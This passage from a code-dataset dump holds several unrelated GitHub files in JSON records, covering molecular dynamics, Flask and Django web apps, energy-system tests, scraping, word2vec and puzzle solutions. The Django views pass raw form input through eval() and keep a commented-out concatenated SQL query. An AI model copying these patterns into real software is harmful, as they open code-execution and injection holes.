AlN.tersoff Al N\n\n### IO\ndump dump_txt all custom 1 lmp.out.dump id type xu yu zu fx fy fz &\n vx vy vz xsu ysu zsu\n##dump dump_xyz all xyz 1 lmp.out.xyz\n##dump_modify dump_xyz element Al N\ndump dump_dcd all dcd 1 lmp.out.dcd\ndump_modify dump_txt sort id\ndump_modify dump_dcd sort id unwrap yes\nthermo_style custom step temp vol cella cellb cellc cellalpha cellbeta cellgamma &\n ke pe etotal &\n press pxx pyy pzz pxy pxz pyz cpu\nthermo_modify flush yes\nthermo 1\n\n### init\nvelocity all create 300.0 123 rot yes dist gaussian\n\n# run\n{ensemble}\ntimestep 0.5e-3\nrun 1000\n\"\"\"\n\nassert len(sys.argv) == 2, \"need one input arg: nvt or npt\"\nif sys.argv[1] == 'npt':\n ens_txt = npt_txt\nelif sys.argv[1] == 'nvt':\n ens_txt = nvt_txt\nelse:\n raise Exception(\"only nvt / npt allowed\")\n\n# create structure file\nst = crys.Structure(coords_frac=np.array([[0.0]*3, [.5]*3]),\n cryst_const=np.array([2.85]*3 + [60]*3),\n symbols=['Al','N'])\nio.write_lammps('lmp.struct', crys.scell(st,(3,3,3)))\n\n# write lmp.in for nvt or npt\ncommon.file_write('lmp.in', lmp_in_templ.format(ensemble=ens_txt))\n\n# run lammps\ncommon.system(\"mpirun -np 2 lmp < lmp.in\", wait=True)\n\n# read trajectory\ntrtxt_orig = io.read_lammps_md_txt('log.lammps')\ntrdcd = io.read_lammps_md_dcd('log.lammps')\n\n# plotting\nplots = mpl.prepare_plots(['coords', 'coords_frac', 'velocity',\n 'cryst_const', 'cell'])\nfor name,pl in plots.items():\n trtxt = trtxt_orig.copy()\n print(name)\n xtxt = getattr(trtxt, name)\n setattr(trtxt, name, None)\n xcalc = eval('trtxt.get_%s()' %name)\n if name == 'cell':\n sl = np.s_[Ellipsis]\n func = lambda x: np.reshape(x, (x.shape[0], 9))\n elif name in trtxt.attrs_nstep_3d:\n # coords_frac and coords: only x-coord (index=0)\n sl = np.s_[Ellipsis,0]\n func = lambda x: x\n else:\n sl = np.s_[Ellipsis]\n func = lambda x: x\n lt = pl.ax.plot(func(xtxt[sl]),'b')\n lc = pl.ax.plot(func(xcalc[sl]),'r')\n ld = pl.ax.plot(func(getattr(trdcd, name)[sl]),'g')\n pl.ax.set_title(name)\n pl.ax.legend((lt[0],lc[0],ld[0]), ('txt', 'calc', 'dcd'))\n\nmpl.plt.show()\n\n","repo_name":"elcorto/pwtools","sub_path":"examples/lammps/md_nvt_npt/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"48"} +{"seq_id":"70419109586","text":"import numpy as np\nimport yaml\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n CONFIG = 'config.yaml'\n with open(CONFIG) as f:\n path = yaml.load(f)\n J1_PATH = path['robotCalibration'] + 'goal/j1.yaml'\n \n with open(J1_PATH) as f:\n J1p = yaml.load(f)\n \n J1v = np.gradient(J1p)\n plt.figure()\n plt.plot(J1p, 'r.')\n plt.figure()\n plt.plot(J1v)\n plt.show()","repo_name":"casiarobot/denso_robot_ros","sub_path":"calibration_flow/scripts/0_robotCalibration/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8686796720","text":"import numpy as np\nimport pandas as pd\nimport datetime as dt\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:

\"\n\t f\"Precipitation Readings
\"\n f\"/api/v1.0/precipitation

\"\n\t f\"List of Stations
\"\n f\"/api/v1.0/stations

\"\n\t f\"Temperature Observations (tobs)
\"\n f\"/api/v1.0/tobs

\"\n f\"Minimum, average, and maximum temperature for a given date.
\"\n f\"/api/v1.0/start (YYYY-MM-DD)

\"\n f\"Minimum, average, and maximum temperature for a given start to end date.
\"\n f\"/api/v1.0/start/end (YYYY-MM-DD)\"\n )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).order_by(Measurement.date.asc()).all()\n session.close()\n\n measurement_date = [result[0] for result in results]\n measurement_prcp = [result[1] for result in results]\n precipitation_dict = dict(zip(measurement_date, measurement_prcp))\n\n return jsonify(precipitation_dict)\n\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n\n session = Session(engine)\n results = session.query(Measurement.station).all()\n session.close()\n\n measurement_stat = [result[0] for result in results]\n measurement_stat_unique = np.unique(measurement_stat).tolist()\n\n return jsonify(measurement_stat_unique)\n\n\n@app.route(\"/api/v1.0/tobs\")\ndef temp_obs():\n\n session = Session(engine)\n\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n last_date = last_date[0]\n last_date = dt.datetime.strptime(last_date, '%Y-%m-%d').date()\n year_ago = last_date - dt.timedelta(days=365)\n\n temps = session.query(Measurement.tobs).filter(Measurement.date >= year_ago).all()\n\n temp_list = []\n\n for i in temps:\n temp_list.append(i[0])\n\n return jsonify(temp_list)\n\n \n@app.route(\"/api/v1.0/\")\ndef start(start):\n\n session = Session(engine)\n start_query = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).all()\n session.close()\n\n start_list = []\n\n startDict = {}\n startDict[\"Minimum\"] = start_query[0][0]\n startDict[\"Average\"] = start_query[0][1]\n startDict[\"Maximum\"] = start_query[0][2]\n start_list.append(startDict)\n\n return jsonify(start_list)\n\n\n@app.route(\"/api/v1.0//\")\ndef start_end_temp(start, end):\n\n session = Session(engine)\n start_end_query = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n session.close()\n\n start_end_list = []\n \n start_end_dict = {}\n start_end_dict[\"Minimum\"] = start_end_query[0][0]\n start_end_dict[\"Average\"] = start_end_query[0][1]\n start_end_dict[\"Maximum\"] = start_end_query[0][2]\n start_end_list.append(start_end_dict)\n\n return jsonify(start_end_list) \n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"neilhsu70/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73828737747","text":"import logging\nimport os\nfrom collections import namedtuple\n\nimport pandas as pd\nimport pytest\n\nfrom oemof import solph as solph\nfrom oemof.solph import processing\nfrom oemof.solph import views\n\n\nclass Label(namedtuple(\"solph_label\", [\"tag1\", \"tag2\", \"tag3\"])):\n __slots__ = ()\n\n def __str__(self):\n return \"_\".join(map(str, self._asdict().values()))\n\n\ndef test_label():\n my_label = Label(\"arg\", 5, None)\n assert str(my_label) == \"arg_5_None\"\n assert repr(my_label) == \"Label(tag1='arg', tag2=5, tag3=None)\"\n\n\ndef test_tuples_as_labels_example(\n filename=\"storage_investment.csv\", solver=\"cbc\"\n):\n logging.info(\"Initialize the energy system\")\n date_time_index = pd.date_range(\"1/1/2012\", periods=40, freq=\"H\")\n\n energysystem = solph.EnergySystem(\n timeindex=date_time_index,\n infer_last_interval=True,\n )\n\n full_filename = os.path.join(os.path.dirname(__file__), filename)\n data = pd.read_csv(full_filename, sep=\",\")\n\n # Buses\n bgas = solph.buses.Bus(label=Label(\"bus\", \"natural_gas\", None))\n bel = solph.buses.Bus(label=Label(\"bus\", \"electricity\", \"\"))\n energysystem.add(bgas, bel)\n\n # Sinks\n energysystem.add(\n solph.components.Sink(\n label=Label(\"sink\", \"electricity\", \"excess\"),\n inputs={bel: solph.flows.Flow()},\n )\n )\n\n energysystem.add(\n solph.components.Sink(\n label=Label(\"sink\", \"electricity\", \"demand\"),\n inputs={\n bel: solph.flows.Flow(fix=data[\"demand_el\"], nominal_value=1)\n },\n )\n )\n\n # Sources\n energysystem.add(\n solph.components.Source(\n label=Label(\"source\", \"natural_gas\", \"commodity\"),\n outputs={\n bgas: solph.flows.Flow(\n nominal_value=194397000 * 400 / 8760, full_load_time_max=1\n )\n },\n )\n )\n\n energysystem.add(\n solph.components.Source(\n label=Label(\"renewable\", \"electricity\", \"wind\"),\n outputs={\n bel: solph.flows.Flow(fix=data[\"wind\"], nominal_value=1000000)\n },\n )\n )\n\n energysystem.add(\n solph.components.Source(\n label=Label(\"renewable\", \"electricity\", \"pv\"),\n outputs={\n bel: solph.flows.Flow(\n fix=data[\"pv\"],\n nominal_value=582000,\n )\n },\n )\n )\n\n # Converter\n energysystem.add(\n solph.components.Converter(\n label=Label(\"pp\", \"electricity\", \"natural_gas\"),\n inputs={bgas: solph.flows.Flow()},\n outputs={\n bel: solph.flows.Flow(nominal_value=10e10, variable_costs=50)\n },\n conversion_factors={bel: 0.58},\n )\n )\n\n # Investment storage\n energysystem.add(\n solph.components.GenericStorage(\n label=Label(\"storage\", \"electricity\", \"battery\"),\n nominal_storage_capacity=204685,\n inputs={bel: solph.flows.Flow(variable_costs=10e10)},\n outputs={bel: solph.flows.Flow(variable_costs=10e10)},\n loss_rate=0.00,\n initial_storage_level=0,\n invest_relation_input_capacity=1 / 6,\n invest_relation_output_capacity=1 / 6,\n inflow_conversion_factor=1,\n outflow_conversion_factor=0.8,\n )\n )\n\n # Solve model\n om = solph.Model(energysystem)\n om.solve(solver=solver)\n energysystem.results[\"main\"] = processing.results(om)\n energysystem.results[\"meta\"] = processing.meta_results(om)\n\n # Check dump and restore\n energysystem.dump()\n es = solph.EnergySystem()\n es.restore()\n\n # Results\n results = es.results[\"main\"]\n meta = es.results[\"meta\"]\n\n electricity_bus = views.node(results, \"bus_electricity_\")\n my_results = electricity_bus[\"sequences\"].sum(axis=0).to_dict()\n storage = es.groups[\"storage_electricity_battery\"]\n storage_node = views.node(results, storage)\n my_results[\"max_load\"] = (\n storage_node[\"sequences\"]\n .max()[[((storage, None), \"storage_content\")]]\n .iloc[0]\n )\n commodity_bus = views.node(results, \"bus_natural_gas_None\")\n\n gas_usage = commodity_bus[\"sequences\"][\n ((\"source_natural_gas_commodity\", \"bus_natural_gas_None\"), \"flow\")\n ]\n\n my_results[\"gas_usage\"] = gas_usage.sum()\n\n stor_invest_dict = {\n \"gas_usage\": 1304112,\n \"max_load\": 0,\n ((\"bus_electricity_\", \"sink_electricity_demand\"), \"flow\"): 8239764,\n ((\"bus_electricity_\", \"sink_electricity_excess\"), \"flow\"): 22036732,\n ((\"bus_electricity_\", \"storage_electricity_battery\"), \"flow\"): 0,\n ((\"pp_electricity_natural_gas\", \"bus_electricity_\"), \"flow\"): 756385,\n ((\"renewable_electricity_pv\", \"bus_electricity_\"), \"flow\"): 744132,\n ((\"renewable_electricity_wind\", \"bus_electricity_\"), \"flow\"): 28775978,\n (\n (\n \"storage_electricity_battery\",\n \"bus_electricity_\",\n ),\n \"flow\",\n ): 0,\n }\n\n for key in stor_invest_dict.keys():\n assert my_results[key] == pytest.approx(stor_invest_dict[key])\n\n # Solver results\n assert str(meta[\"solver\"][\"Termination condition\"]) == \"optimal\"\n assert meta[\"solver\"][\"Error rc\"] == 0\n assert str(meta[\"solver\"][\"Status\"]) == \"ok\"\n\n # Problem results\n assert int(meta[\"problem\"][\"Lower bound\"]) == 37819254\n assert int(meta[\"problem\"][\"Upper bound\"]) == 37819254\n assert meta[\"problem\"][\"Number of variables\"] == 280\n assert meta[\"problem\"][\"Number of constraints\"] == 162\n assert meta[\"problem\"][\"Number of nonzeros\"] == 116\n assert meta[\"problem\"][\"Number of objectives\"] == 1\n assert str(meta[\"problem\"][\"Sense\"]) == \"minimize\"\n\n # Objective function\n assert meta[\"objective\"] == pytest.approx(37819254, abs=0.5)\n","repo_name":"oemof/oemof-solph","sub_path":"tests/test_scripts/test_solph/test_storage_investment/test_storage_with_tuple_label.py","file_name":"test_storage_with_tuple_label.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","stars":255,"dataset":"github-code","pt":"48"} +{"seq_id":"70848498385","text":"from selenium import webdriver\r\nimport pandas as pd\r\n\r\nday = 3\r\nday_to_xpath = {\r\n 3: '//*[@id=\"post-20928\"]/div/div/table[1]/tbody',\r\n 4: '//*[@id=\"post-20948\"]/div/div/div[1]/table[1]/tbody',\r\n 5: '//*[@id=\"post-20986\"]/div/div/table[1]/tbody',\r\n 6: '//*[@id=\"post-21004\"]/div/div/table[1]/tbody',\r\n 8: '//*[@id=\"post-21053\"]/div/div/table[1]/tbody',\r\n 9: '//*[@id=\"post-21056\"]/div/div/table[1]/tbody',\r\n 10: '//*[@id=\"post-21076\"]/div/div/table[1]/tbody',\r\n 11: '//*[@id=\"post-21085\"]/div/div/table[1]/tbody',\r\n 12: '//*[@id=\"post-21095\"]/div/div/table[1]/tbody',\r\n 13: '//*[@id=\"post-21106\"]/div/div/table[1]/tbody',\r\n 14: '//*[@id=\"post-21113\"]/div/div/table[1]/tbody',\r\n 15: '//*[@id=\"post-21150\"]/div/div/table[1]/tbody',\r\n 16: '//*[@id=\"post-21169\"]/div/div/table[1]/tbody',\r\n 18: '//*[@id=\"post-21193\"]/div/div/table[1]/tbody',\r\n 19: '//*[@id=\"post-21198\"]/div/div/table[1]/tbody',\r\n 20: '//*[@id=\"post-21205\"]/div/div/table[1]/tbody',\r\n 21: '//*[@id=\"post-21210\"]/div/div/table[1]/tbody',\r\n 22: '//*[@id=\"post-21244\"]/div/div/table[1]/tbody',\r\n 23: '//*[@id=\"post-21260\"]/div/div/table[1]/tbody',\r\n 24: '//*[@id=\"post-21267\"]/div/div/table[1]/tbody'\r\n}\r\n\r\nbrowser = webdriver.Chrome()\r\nURL = \"https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-\" + str(day) + \\\r\n \"-aprilie-2020-ora-13-00/\"\r\nbrowser.get(URL)\r\n\r\nmain_header = [\"Nr. crt.\", \"Judet\", \"Numar de cazuri confirmate \" + str(day) + \" Aprilie\"]\r\n\r\ninfo = browser.find_element_by_xpath(day_to_xpath[day]).text.split('\\n')\r\ninfo.remove(info[0])\r\n\r\nfor i in range(len(info)):\r\n info[i] = info[i].split(\" \")\r\ninfo[41][1] = \"Mun. Bucuresti\"\r\ninfo[31][1] = \"Satu Mare\"\r\ninfo[41].remove(info[41][2])\r\ninfo[31].remove(info[31][2])\r\ninfo[42] = ['', 'TOTAL', info[42][40]]\r\n\r\nday += 1\r\nbrowser.close()\r\n\r\nwhile day < 25:\r\n if day == 7 or day == 17:\r\n day += 1\r\n\r\n browser = webdriver.Chrome()\r\n URL = \"https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-\" + str(day) + \\\r\n \"-aprilie-2020-ora-13-00/\"\r\n\r\n browser.get(URL)\r\n main_header.append(\"Numar de cazuri confirmate \" + str(day) + \" Aprilie\")\r\n\r\n data = browser.find_element_by_xpath(day_to_xpath[day]).text.split('\\n')\r\n data.remove(data[0])\r\n\r\n if day == 4 or day == 23 or day == 24:\r\n data.remove(data[42])\r\n\r\n for i in range(len(data)):\r\n data[i] = data[i].split(\" \")\r\n\r\n data[41][1] = \"Mun. Bucuresti\"\r\n data[31][1] = \"Satu Mare\"\r\n data[41].remove(data[41][2])\r\n data[31].remove(data[31][2])\r\n data[42] = ['', 'TOTAL', data[42][40]]\r\n\r\n cases = []\r\n for i in range(len(data)):\r\n cases.append(data[i][2])\r\n\r\n for i in range(len(info)):\r\n info[i].append(cases[i])\r\n\r\n day += 1\r\n browser.close()\r\n\r\ndf = pd.DataFrame(info, columns=main_header)\r\ndf.to_excel('Tema.xls', index=0)\r\ndf.to_html('Tema.html', index=0, encoding=\"utf-8\")\r\n","repo_name":"alinparaschiv0107/Python_Google","sub_path":"curs4_Tema.py","file_name":"curs4_Tema.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35558433283","text":"#문자열 포매팅 : 문자열을 정리하는 것\n#'{인덱스0},{인덱스1}'.format(값0,값1)\nname = '홍길동'\nage = 30\nf'나의 이름은 {name}입니다. 나이는 {age}입니다.'\nf'나는 내년이면 {age+1}살이 된다.'\nd = {'name' : '홍길동', 'age' : 30}\nf'나의 이름은 {d[\"name\"]}입니다. 나이는 {d[\"age\"]}입니다.'\nf'{\"hi\":<10}'\n\nf'{\"hi\":>10}'\n\nf'{\"hi\":^10}'\n\nf'{\"hi\":=^10}'\n\nf'{\"hi\":! 10}'\n\ny = 3.42134234\nf'{y:0.4f}'\n\n#f문자열에서 {}문자를 표시하려면서 두개를 동시에 사용\nf'{{ and }}'\n\n#'!!!python!!!'\nf'{\"python\":!^12}'\n\n#문자열 관련 함수\n#문자 개수 세기(count함수)\na = \"hobby\"\na.count('b')\n#위치를 알려주기 1(find)\na = \"Python is the best choice\"\na.find('b')\na.find('k')\n#위치를 알려주기 2(index)\na = \"Life is too short\"\na.index('t')\na.index('k')\n#find 함수와 indx 함수의 다른 점 : 문자열 안에 존재하지 않는 문자를 찾으면 오류가 발생\n\n#문자열 삽입(join)\n\",\".join('abcd')\n\n#소문자를 대문자로 바꾸기 (upper)\na = \"hi\"\na.upper()\n\n#대문자를 소문자로 바꾸기(lower)\na=\"HI\"\na.lower()\n#왼쪽 공백 지우기(lstrip)\na=\"hi\"\na.lstrip()\n#오른쪽 공백 지우기(rstrip)\na=\"hi\"\na.rstrip()\n#양쪽 공백 지우기(strip)\na = \"hi\"\na.strip()\n#문자열 바꾸기(replace)\na = \"Life is too short\"\na.replace(\"short\", \"long\")\n#문자열 나누기(split)\na = \"Life is too short.\"\na.split()\n ","repo_name":"yeyae/Python12","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21850378897","text":"from bisect import bisect_left\n\nn = input() # target\nm = int(input())\nnormal = list(set(range(10)) - set(map(int, input().split()))) # 정상 버튼\n# 숫자 버튼 -> +, - 버튼\ntemp = \"\"\nfor i in n:\n i = int(i)\n if i not in normal:\n # normal인 수 중에서 가장 가까운 수\n a = bisect_left(normal, i)\n if a == len(normal):\n temp += str(normal[a-1])\n elif a == 0:\n temp += str(normal[a])\n else:\n if abs(normal[a-1]-i) <= abs(normal[a-i]):\n temp += str(normal[a-1])\n else:\n temp += str(normal[a])\n else:\n temp += str(i)\n\nif len(temp) + abs(int(temp) - int(n)) <= abs(int(n)-100):\n print(len(temp) + abs(int(temp) - int(n)))\nelse:\n print(abs(int(n)-100))\n\n\n","repo_name":"bhyun/daily-algorithm","sub_path":"2021/BOJ1107_리모컨.py","file_name":"BOJ1107_리모컨.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71158410065","text":"from django.shortcuts import render ,HttpResponse\r\nfrom emp_app.models import Role,Employee,Department\r\nfrom datetime import datetime\r\n\r\nfrom django.db.models import Q\r\n\r\ndef index(request):\r\n return render(request,'index.html')\r\n\r\ndef view_emp(request):\r\n emps=Employee.objects.all()\r\n context={\r\n 'emps':emps\r\n }\r\n print(context)\r\n\r\n return render(request,'view_emp.html',context)\r\n\r\ndef add_emp(request):\r\n\r\n if request.method==\"POST\":\r\n first_name=request.POST.get(\"first_name\")\r\n last_name=request.POST.get(\"last_name\")\r\n dept=eval(request.POST.get(\"dept\"))\r\n role=eval(request.POST.get(\"role\"))\r\n salary=eval(request.POST.get(\"salary\"))\r\n bonus=eval(request.POST.get(\"bonus\"))\r\n phone=eval(request.POST.get(\"phone\"))\r\n\r\n # cur.execute(\"insert into emp_app_employee (first_name,last_name,salary,bonus,phone,hire_date,dept_id,role_id values('\"+first_name+\"','\"+last_name+\"','\"+salary+\"','\"+bonus+\"','\"+phone+\"','\"+hire_date+\"','\"+dept+\"','\"+role+\"');\")\r\n # db.commit()\r\n print(\"added\")\r\n # db.close()\r\n\r\n\r\n new_ep=Employee(first_name=first_name,last_name=last_name,dept_id=dept,role_id=role,salary=salary,bonus=bonus,phone=phone,hire_date=datetime.now())\r\n new_ep.save()\r\n return HttpResponse(\"

Employee Added Successfully

\")\r\n\r\n elif request.method==\"GET\":\r\n return render(request,'add_emp.html')\r\n\r\n else:\r\n return HttpResponse(\"An error occur\")\r\n\r\ndef remove_emp(request,emp_id=0):\r\n if emp_id:\r\n try:\r\n emp_rem=Employee.objects.get(id=emp_id)\r\n \r\n emp_rem.delete()\r\n return HttpResponse(\"Employee Removed successfully\")\r\n except:\r\n return HttpResponse(\"Error\")\r\n emps=Employee.objects.all()\r\n context={\r\n \"emp\":emps\r\n }\r\n\r\n\r\n return render(request,'remove_emp.html',context)\r\n\r\ndef fil_emp(request):\r\n if request.method==\"POST\":\r\n name=request.POST.get(\"name\")\r\n dept=request.POST.get(\"dept\")\r\n role=request.POST.get(\"role\")\r\n\r\n emps=Employee.objects.all()\r\n\r\n if name:\r\n emps=emps.filter(Q(first_name__icontains = name) | Q(last_name__icontains=name))\r\n\r\n if dept:\r\n emps=emps.filter(Q(dept__name__icontains=dept))\r\n\r\n if role:\r\n emps=emps.filter(Q(role__name__icontains=role))\r\n\r\n context={\r\n \"emps\":emps\r\n }\r\n return render(request,\"view_emp.html\",context)\r\n elif request.method==\"GET\":\r\n return render(request,'fil_emp.html')\r\n\r\n# Create your views here.\r\n","repo_name":"Codingboat21/Office-Employee-management-system","sub_path":"office_emp_proj/office_emp_proj/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13552691844","text":"# *******************************************************************************\n# **\n# ** Author: Michael Lomnitz (mrlomnitz@lbl.gov) \n# ** Python module to run word embedding (word2vec) using skipgram or continuos\n# ** bag of words (CBOW) models. Output is then plotted using SKlearn tSNE \n# ** for visualization.\n# **\n# *******************************************************************************\n# Load modules\nimport tensorflow as tf\nimport numpy as np\nimport random\nfrom matplotlib import pylab\nfrom sklearn.manifold import TSNE\n# Local modules\nimport Load_Text_Set as ld\nimport tf_Word2Vec as w2v\n# plotting amcro\ndef plot(embeddings, labels, name):\n assert embeddings.shape[0] >= len(labels), 'More labels than embeddings'\n fig = pylab.figure(figsize=(15,15)) # in inches\n for i, label in enumerate(labels):\n x, y = embeddings[i,:]\n pylab.scatter(x, y)\n pylab.annotate(label, xy=(x, y), xytext=(5, 2), textcoords='offset points',\n ha='right', va='bottom')\n #pylab.show()\n fig.savefig('./'+name+'.pdf')\n\n# Model constants \nbatch_size = 128 # Training batch. Reduces overtraining and training time\nskip_window = 1 # How many words to consider left and right.\nnum_skips = 2 # How many times to reuse an input to generate a label.\n# Cosmntruct random validation sample from the loaded dataset. Limit ourselves\n# to a sample of words that have a low numeric ID, which by (i.e. frequent)\nvalid_size = 16 # Random set of words to evaluate similarity on.\nvalid_window = 100 # Only pick dev samples in the head of the distribution.\nvalid_examples = np.array(random.sample(range(valid_window), valid_size))\nvocabulary_size = 200000\n# Switch betweenskipgram and CBOW models\nuse_CBOW = True\n#\ngraph = tf.Graph()\nwords = ld.text_8(vocabulary_size)\n#\ndef run_embeddings():\n with graph.as_default(), tf.device('/cpu:0'):\n # Input data.\n if use_CBOW == False:\n train_dataset = tf.placeholder(tf.int32, shape=[batch_size])\n else: \n train_dataset = tf.placeholder(tf.int32, shape=[batch_size,num_skips])\n train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])\n valid_dataset = tf.constant(valid_examples, dtype=tf.int32)\n #\n embeddings = w2v.word_embedding(vocabulary_size, use_CBOW)\n optimizer,loss = embeddings.train(train_dataset, train_labels)\n \n num_steps = 100001\n\n with tf.Session(graph=graph) as session:\n tf.global_variables_initializer().run()\n print('Initialized')\n average_loss = 0\n for step in range(num_steps):\n if use_CBOW == False:\n batch_data, batch_labels = w2v.generate_batch(\n batch_size, num_skips, skip_window, words.data)\n else:\n batch_data, batch_labels = w2v.generate_batch_CBOW(\n batch_size, num_skips, skip_window, words.data)\n #\n feed_dict = {train_dataset : batch_data, train_labels : batch_labels}\n _, l = session.run([optimizer, loss], feed_dict=feed_dict)\n average_loss += l\n # The followign are just to keep track of the training and the performance\n if step % 2000 == 0:\n if step > 0:\n average_loss = average_loss / 2000\n # The average loss is an estimate of the loss over the last 2000 batches.\n print('Average loss at step %d: %f' % (step, average_loss))\n average_loss = 0\n # note that this is expensive (~20% slowdown if computed every 500 steps)\n if step % 10000 == 0:\n #sim = similarity.eval()\n sim = embeddings.similarity(valid_dataset)\n for i in range(valid_size):\n valid_word = words.reverse_dictionary[valid_examples[i]]\n top_k = 8 # number of nearest neighbors\n nearest = (-sim[i, :]).argsort()[1:top_k+1]\n log = 'Nearest to %s:' % valid_word\n for k in range(top_k):\n close_word = words.reverse_dictionary[nearest[k]]\n log = '%s %s,' % (log, close_word)\n print(log)\n final_embeddings = embeddings.normalized_embeddings.eval()\n return(final_embeddings)\n# plot output results\n","repo_name":"CDIPS-AI-2017/pensieve","sub_path":"Notebooks/word2vec/run_Word2Vec.py","file_name":"run_Word2Vec.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41463529289","text":"import copy\n\n\nstart_time = 30\nstart_valve = 'AA'\n\n\ndef complete(valves):\n num_valves = len(valves)\n is_complete = False\n while not is_complete:\n is_complete = True\n for key, valve in valves.items():\n new_edges = {}\n for neighbor, cost in valve['edges'].items():\n if neighbor in new_edges:\n new_edges[neighbor] = min(cost, new_edges[neighbor])\n else:\n new_edges[neighbor] = cost\n for edge, added_cost in valves[neighbor]['edges'].items():\n if edge == key:\n continue\n if edge in new_edges:\n new_edges[edge] = min(cost + added_cost, new_edges[edge])\n else:\n new_edges[edge] = cost + added_cost\n valve['edges'] = new_edges\n if len(new_edges) < num_valves - 1:\n is_complete = False\n\n\ndef clean(valves, starter_costs):\n baddies = [name for name, valve in valves.items() if valve['rate'] == 0]\n for baddie in baddies:\n del valves[baddie]\n del starter_costs[baddie]\n for valve in valves.values():\n for baddie in baddies:\n del valve['edges'][baddie]\n\n\ndef find_starter_costs(valves):\n costs = copy.deepcopy(valves[start_valve]['edges'])\n costs[start_valve] = 0\n return costs\n\n\ndef score(valves, starter_costs, candidate):\n costs = starter_costs\n time = start_time\n score = 0\n for name in candidate:\n time -= costs[name] + 1\n if time <= 0:\n break\n score += time * valves[name]['rate']\n costs = valves[name]['edges']\n return score\n\n\ndef search(valves, time, costs, current=[]):\n yield current\n for name, cost in costs.items():\n if name in current:\n continue\n if time - cost - 1 > 0:\n candidates = search(valves, time - cost - 1, valves[name]['edges'], current + [name])\n if candidates is not None:\n for candidate in candidates:\n yield candidate\n\n\ndef solve(valves):\n complete(valves)\n starter_costs = find_starter_costs(valves)\n clean(valves, starter_costs)\n # example = ['DD', 'BB', 'JJ', 'HH', 'EE', 'CC']\n best_score = 0\n i = 0\n # for candidate in itertools.permutations(valves.keys()):\n for candidate in search(valves, start_time, starter_costs):\n i += 1\n value = score(valves, starter_costs, candidate)\n if value > best_score:\n best_score = value\n print(f'{i}: {best_score}')\n print(f'iterations: {i}')\n return best_score\n\n\ndef read(path):\n with open(path, 'r') as f:\n rows = [row.rstrip() for row in f.readlines()]\n nodes = {}\n for row in rows:\n parts = row.split(' ')\n name = parts[1]\n rate = int(parts[4][5:-1])\n edges = {edge.rstrip(','): 1 for edge in parts[9:]} \n nodes[name] = {\n 'name': name,\n 'rate': rate,\n 'edges': edges,\n }\n return nodes\n\n\ndef main(path, is_test):\n data = read(path)\n return solve(data)\n\n\ndef display(output):\n print('\\n')\n try:\n iterator = iter(output)\n except TypeError:\n print(output)\n pass\n else:\n for line in iterator:\n print(line)\n\n\nif __name__ == \"__main__\":\n is_test = False\n import os\n dirname = os.path.realpath(os.path.dirname(__file__))\n filename = 'test.txt' if is_test else 'input.txt'\n path = f'{dirname}/{filename}'\n import sys\n\n if (len(sys.argv) < 2):\n display(main(path, is_test=is_test))\n else:\n for f in sys.argv[1:]:\n display(main(f))\n","repo_name":"slovb/aoc-2022","sub_path":"Day16/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38386893043","text":"import numpy as np\n\ndef convert_to_np_array(dataset, split_name):\n \"\"\"\n Function that converts images and labels in TFRecords into separate NumPy arrays\n\n Args:\n dataset (int): The TFRecord containing both images and their associated image labels\n split_name (str): the data split the function is being invoked for\n\n Returns:\n x_cassava: NumPy array of images\n y_cassava: NumPy array of image labels\n \"\"\"\n\n #get the number of images in dataset\n num_images = len(dataset)\n\n #created empty vectors to populate\n #x_cassava = np.empty([num_images, img_size, img_size, 3], dtype='float32')\n y_cassava = np.empty(num_images, dtype='float32')\n\n #populate the above vectors\n counter = 0\n for image, label in dataset: \n #x_cassava[counter] = data[\"image\"]\n #y_cassava[counter] = 